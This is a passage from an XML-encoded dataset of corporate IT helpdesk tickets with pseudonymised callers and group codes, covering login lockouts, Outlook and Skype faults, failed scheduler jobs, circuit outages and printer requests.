    <s v="tjlgzkbp iervwjzg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="unable to sign in to skype"/>
    <s v="vupmctne ylnsweao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp changing order qty issue"/>
    <s v="please look at sale order 36112082 csr zektaqof cgxlqtiz released order from workflow and the qty went from 1pc to 12,047,279pcs showing csr changed the qty csr did not change qty please review possible issue maybe wf batch issue"/>
    <s v="zektaqof cgxlqtiz"/>
    <x v="12"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze"/>
    <s v="uacyltoe hxgaycze"/>
    <s v="xweclugf qmhbjsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ticket update inplant_867508"/>
    <s v="ticket update inplant_867508"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="excel keeps exiting"/>
    <s v="excel keeps exiting"/>
    <s v="qpkbiwzl urypnjvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update mileage details. site not loading."/>
    <s v="unable to update mileage details. site not loading."/>
    <s v="eqwaiphc qxwfeuth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_1 password reset"/>
    <s v="erp SID_1 password reset"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meetings"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dlougnqw.jiuybxew@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_can you please assist me with getting the skype meetings back up and running for me?  it came up before but i no longer have the option._x000d__x000a__x000d__x000a_"/>
    <s v="dlougnqw jiuybxew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issue ; personal certificate error "/>
    <s v="skype issue ; personal certificate error "/>
    <s v="yaxrnmsz bultagqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pos data update - september 2016"/>
    <s v="_x000a_from: navdgtya kuhyakose _x000a_sent: friday, october 07, 2016 7:37 pm_x000a_to: htsnaodb adjtmlzn_x000a_cc: petgvwch zevpkogu; khfgharla mwdjuli; vthuzanc fqdgotvx; rzucjgvp ioqjgmah; nawkpdtx gwcvmbhn_x000a_subject: pos - septemer '16_x000a__x000a_hi karghyuen,_x000a__x000a_i have compared the pos data between crm and bi for september '16 and the data are in sync._x000a_i will run the programdnty on 10/10 to update the table zcp002._x000a__x000a_crm                                           bi _x000a_count of mandt sum of toengineering_tool  sum of counter sum of total distributor cost_x000a_                     225 82,043.48                             225       82,043.48_x000a__x000a__x000a_"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="14"/>
  </r>
  <r>
    <s v="unable to access vpn"/>
    <s v="unable to access vpn"/>
    <s v="cziadygo veiosxby"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool etime issue "/>
    <s v="hr_tool etime issue "/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error : windows 7 build 7601 this copy of windows is not genuine."/>
    <s v="error : windows 7 build 7601 this copy of windows is not genuine._x000a_for next 2 weeks he will be in usa. _x000a_contact : "/>
    <s v="dcxjngaf zquoewhp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="audio issue in skype"/>
    <s v="audio issue in skype"/>
    <s v="ytqambip bovfzich"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please allow access for using printer in india office."/>
    <s v="please allow access for using printer in india office._x000d__x000a__x000d__x000a_please refer the attachment "/>
    <s v="sanoibgk zpuawcbl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="please to provide access to solman environment - user vvamrtryot."/>
    <s v="please to provide access to solman environment, solman SID_51 (production)  for the user vvamrtryot._x000d__x000a_he need this access to open requests  for theses charms 8111118319  and 8111118310._x000d__x000a_"/>
    <s v="gdsjrxwl pzhyxdiq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="engineering_tool installation "/>
    <s v="engineering_tool installation "/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not opening"/>
    <s v="outlook not opening"/>
    <s v="hugcadrn ixhlwdgt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise // gso"/>
    <s v="blank call // loud noise // gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="itylnjqw kqiurhbt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to see workflow in erp SID_34"/>
    <s v="unable to see workflow in erp SID_34"/>
    <s v="obvjhlsa jxnlwspq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="anleitung fuer password_management_tool"/>
    <s v="anleitung fuer password_management_tool"/>
    <s v="zgirlxwp kmeaylhi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't access to hr_tool etime"/>
    <s v="_x000a__x000a_received from: zywoxerf.paqxtrfk@gmail.com_x000a__x000a_dear help desk:_x000a_i can't access to hr_tool etime, see below:_x000a__x000a_error 500!_x000a__x000a_the page you are trying to reach is not available. an internal server error was raised._x000a__x000a__x000a_x.  jdamieul  fandyhgg_x000a__x000a_senior staff engineer_x000a_zywoxerf.paqxtrfk@gmail.com_x000a_"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working : webpages not loading "/>
    <s v="wifi not working : webpages not loading "/>
    <s v="udetjzmn ayueswcm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delay in presenting the cal on the polycom phone"/>
    <s v="when a call comes in, its first presented on the computer screen and only a few sec later the phone starts ringing._x000d__x000a_the time between is around 5 sec."/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="6"/>
  </r>
  <r>
    <s v="user's manager's manager pointing wrongly to vtykrubi whsipqno"/>
    <s v="examples given: shesyhur reports to davidthd and davidthd should be reporting to chukhyt and not ron. like wise, managing_director should be reporting. _x000a_this only happened to records being updated today. see attached screenshots."/>
    <s v="cfzsajbe lyejkdho"/>
    <x v="39"/>
  </r>
  <r>
    <s v="call from vendor about crm"/>
    <s v="call from vendor about crm"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze"/>
    <s v="uacyltoe hxgaycze"/>
    <s v="rxoluzhy pnutohms"/>
    <x v="35"/>
  </r>
  <r>
    <s v="handscanner an pc evhw8114202 ohne funktion -&gt; rep. oder ersetzen;"/>
    <s v="handscanner an pc evhw8114202 ohne funktion -&gt; rep. oder ersetzen (pc in halle c bei r208 erp terminal)"/>
    <s v="ljxzyriq zqxkrcev"/>
    <x v="32"/>
  </r>
  <r>
    <s v="i can't get logged into outlook.  the problem started thursday, october 6 around 430 pm.  reichlhdyl"/>
    <s v="_x000a_usa_x000a_skype is working._x000a_"/>
    <s v="xkmvpaei fizqoprk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue - not authorized for transaction vf02 in SID_1"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000d__x000a__x000d__x000a_enter user id of user having the issue: hellej_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: vf02_x000d__x000a__x000d__x000a_describe the issue: i'm not authorized for transaction vf02 in SID_1. please find attached the error message._x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user: maryhtutina bauuyternfeyt"/>
    <s v="pkjhmfgc zuvjqgwa"/>
    <x v="19"/>
  </r>
  <r>
    <s v="please reset the password."/>
    <s v="please reset the password."/>
    <s v="toeibhlp gukqjwnr"/>
    <x v="6"/>
  </r>
  <r>
    <s v="job Job_488 failed in job_scheduler at: 10/07/2016 06:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_488 failed in job_scheduler at: 10/07/2016 06:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pc defekt"/>
    <s v="empw 8111616 01/14 defekt. code: 0x000000ed blue screen"/>
    <s v="vpnraqfk pgocqjbu"/>
    <x v="32"/>
  </r>
  <r>
    <s v="crm buttons"/>
    <s v="i have recently upgraded our calendar / outlook to the crm software upgrade. i do not have the &quot;track&quot; and &quot;set regarding&quot; toolbar selections as seen in the snap shot below. so the install did not complete. i need the server side synchronization of incoming emails corrected and the crm application permissions for my 2in1. if that is not correct and you believe it to be another issue let me know. _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_this is not a phone issue. thus is a notebook or 2in1 issue. please review the snap shots i sent in and advise._x000d__x000a_"/>
    <s v="ktcvsagx vftapxuc"/>
    <x v="22"/>
  </r>
  <r>
    <s v="network outage:russia, engineering_toolkuznetsk site is down at 6:41 am et on 10/07. "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___________6:41 am et on 10/07. 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_na___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _______na_     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___na________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _____na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x v="7"/>
  </r>
  <r>
    <s v="job Job_2049a failed in job_scheduler at: 10/07/2016 06:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2049a failed in job_scheduler at: 10/07/2016 06:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="install drucker we17\ewew8323647\hnyeajrw ctxjsolz"/>
    <s v="install drucker we17\ewew8323647\hnyeajrw ctxjsolz"/>
    <s v="hnyeajrw ctxjsolz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install drucker we17\ewew8323646\lxfnwyuv bqmjyprz"/>
    <s v="install drucker we17\ewew8323646\lxfnwyuv bqmjyprz"/>
    <s v="lxfnwyuv bqmjyprz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="printing language sa38 (reporting rfumsv00)"/>
    <s v="please complete all required questions below.  _x000a_if not, it will be returned back to the gsc / requester to provide required information_x000a__x000a_ â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart._x000a__x000a_   â€¢  printer name / make - model? kq02 (hp laserjet p3005x)_x000a_ _x000a_   â€¢  detailed description of the problem ? wrong carahcters printing reporting rfumsv00. error message &quot;pjl enter language=pcl&quot;_x000a__x000a_   â€¢  type of documents not printing?  sa38 - reporting rfumsv00 - tax on sls/purch.advanced return _x000a__x000a_   â€¢  what system or application being used at time of the problem?     erp_x000a__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? it prints, but with wrong language (characters)_x000a__x000a_   â€¢  if erp system, which system?  SID_34_x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? no, i tried in another erp printer, issue persits the same._x000a_         what printer can it be rerouted too? not applicable_x000a__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket. (file attached)_x000a__x000a_sÃ³nia pereira_x000a_accounting and report analyst, finance_x000a_ojhiaubp.lovgirtm@gmail.com_x000a_"/>
    <s v="ojhiaubp lovgirtm"/>
    <x v="32"/>
  </r>
  <r>
    <s v="kindly install software paint shop and winzip"/>
    <s v="kindly install software paint shop and winzip"/>
    <s v="fcqxdusv zvkbhayo"/>
    <x v="28"/>
  </r>
  <r>
    <s v="install drucker we17 \oziflwma nhgvmqdl"/>
    <s v="install drucker we17 \oziflwma nhgvmqdl"/>
    <s v="vrfpyjwi nzhvgqiw"/>
    <x v="24"/>
  </r>
  <r>
    <s v="benÃ¶tige eine zahlenblock-tastatur fÃ¼r linke hand."/>
    <s v="hallo ._x000a__x000a_benÃ¶tige eine zahlenblock-tastatur fÃ¼r linke hand._x000a_"/>
    <s v="wtgbdjzl coliybmq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="EU_tool lÃ¤uft sehr langsam im werk germany. rÃ¼ckmeldungen kÃ¶nnen nicht mehr eingegeben werden (laufzeitfehler)."/>
    <s v="aktuell kÃ¶nnen keine rÃ¼ckmeldungen in EU_tool eingegeben werden. fehler &quot;laufzeitfehler&quot;."/>
    <s v="lpnzjimy mwtvondq"/>
    <x v="25"/>
  </r>
  <r>
    <s v="stocktransfer  goes not      mm 5112324"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mgahlpwx.jwtfpaxh@gmail.com_x000d__x000a__x000d__x000a_hello at all_x000d__x000a__x000d__x000a_istÂ´s not possible to create the delivery note_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d2208b.07571691]_x000d__x000a__x000d__x000a_best "/>
    <s v="mgahlpwx jwtfpaxh"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_2063a failed in job_scheduler at: 10/07/2016 05:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063a failed in job_scheduler at: 10/07/2016 05:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ethics webportal login issue"/>
    <s v="not able login to ethics website, please find the screenshot for the same and kindly help regarding this issue, "/>
    <s v="fmjwzstr yjotleqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pulverleitstand and chargenverwaltung doesn't work corectly"/>
    <s v="pulverleitstand and chargenverwaltung doesn't work correctly. either it runs very slow or it crashes down. there are error messages all the time._x000d__x000a_EU_tool also runs very slow."/>
    <s v="jltebswi zmvohjws"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/07/2016 04:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/07/2016 04:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_512 failed in job_scheduler at: 10/07/2016 04:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_512 failed in job_scheduler at: 10/07/2016 04:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="automatische datenaufbereitung qa geht nicht"/>
    <s v="automatische datenaufbereitung geht nicht"/>
    <s v="tbioceqj ukjietwz"/>
    <x v="32"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="mtcywlxv cklzmxyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:germany: company-eu-deu-erkheim-dmvpn-2821-rtr01 is down since 2:59:20 am et on 10/7/2016."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _______no__     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______2:59:20 am et on 10/7/2016 ________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _no______    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _no__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x v="7"/>
  </r>
  <r>
    <s v="outlook is not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: krilnmcs.chpkeyqb@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a__x000d__x000a_yesterday i started outlook in the morning._x000d__x000a__x000d__x000a__x000d__x000a_as every morning it started very quick but when i tryed to open a mail i received a white screen. i tried several new computer starts but nothing changed._x000d__x000a__x000d__x000a__x000d__x000a_so i decided to work via collaboration_platform and i'm doing this right now as well because today i had the same negative result with outlook (start was quick and that's it, no chance to read an email or write one)._x000d__x000a__x000d__x000a__x000d__x000a_please have alook into this matheywter because working via collaboration_platform i sless comfortable and slowing down._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="krilnmcs chpkeyqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dba team the imwveudk mykcourx processor has stopped again, please restart!"/>
    <s v="dba team. the job processor at the engg application has stopped again. please restart as soon as possible._x000a__x000a_dmqxwkfr olmwqzpu_x000a_"/>
    <s v="dmqxwkfr olmwqzpu"/>
    <x v="57"/>
  </r>
  <r>
    <s v="plant plant_197/  EU_tool system is running very slowly/ big problems to enter the productions plans"/>
    <s v="plant plant_197/  EU_tool system is running very slowly/ big problems to enter the productions plans"/>
    <s v="wckrxovs aunsgzmd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="abend job bkwin_tax_interface_qa_daily"/>
    <s v="job name:bkwin_tax_interface_qa_daily"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="purchasing, online katalog de-technischer handel funkioniert nicht"/>
    <s v="purchasing, online katalog de-technischer handel funkioniert nicht"/>
    <s v="ryaudfxm shjdaolm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="routing fix in germany"/>
    <s v="please add a static route on the lan switch in germany to ensure access to the shop floor network is not disrupted during downtime of the vpn router._x000d__x000a__x000d__x000a_company-eu-deu-germany-emsw27-3750e-core-sw01#_x000d__x000a_conf t_x000d__x000a_ip route 10.16.56.0 255.255.252.0 10.16.32.40_x000d__x000a_exit_x000d__x000a_copy running-config startup-config_x000d__x000a__x000d__x000a_"/>
    <s v="smpijawb eawkpgqf"/>
    <x v="3"/>
  </r>
  <r>
    <s v="need access"/>
    <s v="_x000a__x000a_received from: tcbonyes.gpfacron@gmail.com_x000a__x000a_hello,_x000a_i need an access to email address to modify as and when required. please provide me the access for below mentioned mailing addressâ€¦.._x000a__x000a_k-bnthygl-pdu6-hdjm-er_x000a_k-bhrtty-pdlc4-yhhm-er_x000a__x000a__x000a__x000a_with best "/>
    <s v="tcbonyes gpfacron"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="ypcudwsf phvatzje"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hrt archive jobs are failing"/>
    <s v="hrt archive jobs are failing with error _x000d__x000a_ora-28000: the account is locked_x000d__x000a_br0310w connect to database instance hrt failed"/>
    <s v="jloygrwh acvztedi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="job bkwin_tax_interface_dev_daily failed in job_scheduler at: 10/06/2016 22:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_tax_interface_dev_daily failed in job_scheduler at: 10/06/2016 22:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 10/06/2016 20:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 10/06/2016 20:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ticket update on inplant_867391"/>
    <s v="ticket update on inplant_867391"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot extract finance_app data - pls resolve immediately"/>
    <s v="_x000a__x000a_received from: uagqromi.sqgtkmci@gmail.com_x000a__x000a_[cid:image001.png@01d22075.f8d4be00]_x000a__x000a_uagqromi sqgtkmci_x000a_controller_x000a_uagqromi.sqgtkmci@gmail.com&lt;mailto:uagqromi.sqgtkmci@gmail.com&gt;_x000a__x000a_&lt;_x000a__x000a_[cid:image002.png@01d22075.f8d4be00]_x000a__x000a__x000a__x000a_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a_[#+company/posts&gt;  [_x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="uagqromi sqgtkmci"/>
    <x v="54"/>
  </r>
  <r>
    <s v="unable to install crm for outlook"/>
    <s v="unable to install crm for outlook"/>
    <s v="itslpwra vybdkuoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_867380"/>
    <s v="ticket update on inplant_867380"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2881 failed in job_scheduler at: 10/06/2016 18:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2881 failed in job_scheduler at: 10/06/2016 18:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="outlook programdnty takes about 30 min to load"/>
    <s v="outlook programdnty takes about 30 min to load"/>
    <s v="itslpwra vybdkuoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset to login to hub "/>
    <s v="password reset to login to hub "/>
    <s v="wbgxieyh zvasjtdc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need access to folder "/>
    <s v="_x000d__x000a__x000d__x000a_received from: umdyvbxo.qwzstijr@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need access to quality folder in lan-d2 drive of usa._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="umdyvbxo qwzstijr"/>
    <x v="11"/>
  </r>
  <r>
    <s v="engineering tool page not opening"/>
    <s v="engineering tool page not opening"/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="analysis add-in keeps getting removed"/>
    <s v="analysis add-in keeps getting removed"/>
    <s v="tjlgzkbp iervwjzg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out : ad"/>
    <s v="account locked out : ad"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales order 36112960 generated a 10/13 delivery date despite the order being markhtyed for 2nd day air.why?"/>
    <s v="nibaotpy vmxathog  _x000a__x000a__x000a_"/>
    <s v="nibaotpy vmxathog"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp SID_1 account unlock"/>
    <s v="erp SID_1 account unlock"/>
    <s v="slkxgzdj wxpytevu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage :usa-dmvpn-1811-rtr01 is down since 10/6/2016 1:43 pm. primary is up."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo 60 mins_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________10/6/2016 1:43 pm.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please can you unlock the user vvamrtryot on the environment SID_21 again?"/>
    <s v="please can you unlock the user vvamrtryot on the environment SID_21 again?_x000d__x000a_seems is still locked there, only in SID_21, for all other everything is fine."/>
    <s v="gdsjrxwl pzhyxdiq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request: team viewer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sthyuraj.sektyhar@company.com_x000d__x000a__x000d__x000a_need to access a pc that does not have skype_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="sxhqfaoe evobwgiy"/>
    <x v="18"/>
  </r>
  <r>
    <s v="hpqc uacyltoe hxgaycze  installation "/>
    <s v="hpqc uacyltoe hxgaycze  installation "/>
    <s v="qscdktvl rihendxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change in offline cache mode in outlook to 12 months"/>
    <s v="change in offline cache mode in outlook to 12 months"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp closes when opening attachment in md04"/>
    <s v="erp closes when opening attachment in md04"/>
    <s v="myaornqv fkjmpxbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="purchasing purchasing-add user to the purchasingupstreamsso ad group "/>
    <s v="when i log in to purchasing and choose company catalog, the window never loads up."/>
    <s v="raifstow gfeymtql"/>
    <x v="29"/>
  </r>
  <r>
    <s v="erp SID_1 : password reset "/>
    <s v="erp SID_1 : password reset "/>
    <s v="qscdktvl rihendxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms dynamics not synched in outlook"/>
    <s v="ms dynamics not synched in outlook"/>
    <s v="xrqnyzhb oblghuyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue with outlook profile and skype for business ugyothfz ugrmkdhx ambals"/>
    <s v="i was having issues opening outlook and skype for business and reached out to pc services to investigate on this issue. "/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to login to erp and distributor_tool"/>
    <s v="unable to login to erp and distributor_tool"/>
    <s v="qyfrgeop loimdzgs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update : inplant_867204"/>
    <s v="ticket update : inplant_867204"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="4908206193/00001 dn required by 2 oclock est"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kaguhxwo.uoyipxqg@gmail.com_x000d__x000a__x000d__x000a_it team,_x000d__x000a_please create dn for 5019317204/00001 warehouse today before they cut off time. "/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="5"/>
  </r>
  <r>
    <s v="installation of skype"/>
    <s v="installation of skype"/>
    <s v="kijgcwlh gfejlcvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="lfuzpjvr chmswkvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="nda emails are not getting sent"/>
    <s v="ramdnty,  i think the workflows need looked at on the nda,, there are several ttemplates not working.  as a note, during the outage on tuesday several workflows lost their settings.  i had to redo a few.  that may be the case with the nda/"/>
    <s v="qwfztdvc czmndgti"/>
    <x v="15"/>
  </r>
  <r>
    <s v="job Job_1387 failed in job_scheduler at: 10/06/2016 11:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1387 failed in job_scheduler at: 10/06/2016 11:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="adding user dinthyesh &lt;achthyardk&gt; to distribution group : -ethyxekirty ; -etyhumpdil "/>
    <s v="adding user dinthyesh &lt;achthyardk&gt; to distribution group : -exekirty ; -empkirty "/>
    <s v="rnueobcz lwhcbati"/>
    <x v="0"/>
  </r>
  <r>
    <s v="software to read the text from the scanned pages."/>
    <s v="software to read the text from the scanned pages."/>
    <s v="rnueobcz lwhcbati"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view subject option in outlook"/>
    <s v="unable to view subject option in outlook"/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype call join ends up in bad call or blanks out during multiple attempts"/>
    <s v="skype call join ends up in bad call or blanks out during multiple attempts"/>
    <s v="zanivrec capbfhur"/>
    <x v="26"/>
  </r>
  <r>
    <s v="no login options in erp"/>
    <s v="after netweaver installing it is not possible to log in to erp 740. _x000a_user name: nagdyiyst"/>
    <s v="krdvgzeh yboasemp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="passwort geoyhurg chriuimjiann "/>
    <s v="_x000d__x000a__x000d__x000a_received from: nsoikcyf.jhybqael@gmail.com_x000d__x000a__x000d__x000a_bitte passwort und acount freischalten_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sykpe does not work"/>
    <s v="skype does not log me on when i turn on the computer. Phone"/>
    <s v="otagsuzp xazhusry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user account not in validity date."/>
    <s v="unable to login to erp SID_1. error: user account not in validity date."/>
    <s v="jehlsagi dhkfuswg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lkfzibrx.ljnabpgx@gmail.com_x000d__x000a__x000d__x000a_hello it team_x000d__x000a__x000d__x000a_for some reason when i go to some of the folders i got the message belwo i cannot open some folder it appears the message below?_x000d__x000a__x000d__x000a_i will appreciate your support_x000d__x000a__x000d__x000a_"/>
    <s v="lkfzibrx ljnabpgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform table for crm"/>
    <s v="_x000a__x000a_received from: troxyekl.lzdvgwut@gmail.com_x000a__x000a_hello,_x000a__x000a_please add user delthybid (jeknosml gkcoltsy) to the collaboration_platform table for crm._x000a_"/>
    <s v="troxyekl lzdvgwut"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account is locked out : ad account "/>
    <s v="account is locked out : ad account "/>
    <s v="gwmspqeo vwfetaqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to print from hr_tool"/>
    <s v="not able to print from hr_tool"/>
    <s v="hiysxgwf vqdbtexf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for gjisfonb odwfhmze using password_management_tool password reset."/>
    <s v="the"/>
    <s v="gjisfonb odwfhmze"/>
    <x v="16"/>
  </r>
  <r>
    <s v="analysis for microsoft excel is no longer available"/>
    <s v="analysis for microsoft excel is no longer available._x000d__x000a_attached you can find the note."/>
    <s v="znqlmjvt uhyokzlt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
